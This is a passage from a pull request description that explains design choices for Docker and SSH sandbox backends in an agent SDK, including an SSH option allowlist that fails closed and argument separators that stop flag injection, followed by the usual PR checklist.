  - Docker's official Node SDK (@docker/node-sdk) is pre-1.0 (v0.0.17) with no stability guarantees. There is no official vendor-backed SSH SDK for Node. Both implementations reuse streamProcess (which already handles streaming, timeouts, SIGTERM→SIGKILL escalation, and AbortSignal) with zero added dependencies.

- `/tmp` as default Docker workingDir
  - PR #1011 used /workspace with a post-start chown to fix ownership. That's broken: `--cap-drop ALL` strips CAP_CHOWN, so the chown silently fails. /tmp is world-writable on every standard base image — works with non-root user + cap-drop without any fixup. Users who need a custom path own ensuring it's writable in their image.

- Allowlist over blocklist for SSH options
  - Usage of a blocklist was explicitly called out due to residual risk from future OpenSSH flags. The allowlist contains 36 known-safe options (connection tuning, crypto, authentication) and fails closed — unknown options throw at construction time. allowUnsafeSshOptions: true is the explicit bypass.

- `--` separator before positional CLI args
  - Prevents `image` or `host` values starting with `-` from being interpreted as flags

## Related Issues

<!-- Link to related issues using #issue-number format -->

- #1011 (parent mega-PR)
- #1090 (base `Sandbox` / `PosixShellSandbox` interfaces)

## Documentation PR

<!-- Link to related associated PR in the agent-docs repo -->

Not yet

## Type of Change

<!-- Choose one of the following types of changes, delete the rest -->

New feature

## Testing

How have you tested the change?

- [x] I ran the relevant checks (`hatch run prepare` for Python, `npm run check` for TypeScript)

## Checklist
- [x] I have read the CONTRIBUTING document
- [x] I have added any necessary tests that prove my fix is effective or my feature works
- [ ] I have updated the documentation accordingly
- [x] I have added an appropriate example to the documentation to outline the feature, or no new docs are needed
- [x] My changes generate no new warnings
- [x] Any dependent changes have been merged and published

----

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.
